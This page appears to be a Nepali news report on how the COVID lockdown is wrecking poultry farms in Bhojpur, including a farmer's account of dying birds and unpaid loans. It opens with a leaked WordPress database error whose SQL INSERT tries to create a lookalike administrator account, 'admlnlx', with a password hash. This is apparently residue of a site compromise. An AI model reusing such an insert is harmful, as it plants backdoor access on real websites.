WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BQA1IAyIEwmRdelVYHREwGYs7AScgy.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 10:32:07', '', 'admlnlx', 'admlnlx')
बैशाख २५, भोजपुर- डेढ महिनायता जारी लकडाउनले कुखरापालन व्यवसायमा नराकारात्मक प्रभाव पारेको छ ।
लकडाउनका कारण बजारमा दाना नपाएर कुखुरा मर्न थालेपछि धेरै पोल्ट्री फर्म रित्तिन थालेका छन् । लाखौंको लगानीमा थालेको व्यावसायिक कुखुरापालनमा लागेका युवा लकडाउनका कारण व्यवसाय धरासायी बनेपछि निराश भएका हुन्।
ब्याङ्कबाट ऋण लिएर थालेको व्यवसाय लकडाउनले चौपट बनाएपछि किस्ता तिर्नसमेत समस्या भएको अजिमा पोल्ट्री फर्म टक्सारका सञ्चालक दिपक श्रेष्ठले बताए । श्रेष्ठ थप्छन्, ‘३० लाखभन्दा बढीको लगानी छ, दैनिक २२ हजारभन्दा बढी दानामा खर्च हुन्छ, दाना खरिद गर्न नसक्दा कुखुरा मर्न थाले, गाउँगाउँबाट मकै किनेर खुवाइरहेको छु । ब्याङ्कको किस्ता तिर्न समस्या भयो, लकडाउन यसरी नै बढिरह्यो भने के गर्ने, यतिबेला कुनै विकल्प छैन।’ जिल्लाका करिब ३ दर्जनभन्दा बढी व्यावसायिक कुखुराफर्म, अन्य पशुपालन व्यावसाय, र तरकारी फर्महरू लकडाउनले ठप्प अन्नपूर्ण पोस्ट मा खबर प्रकाशित छ ।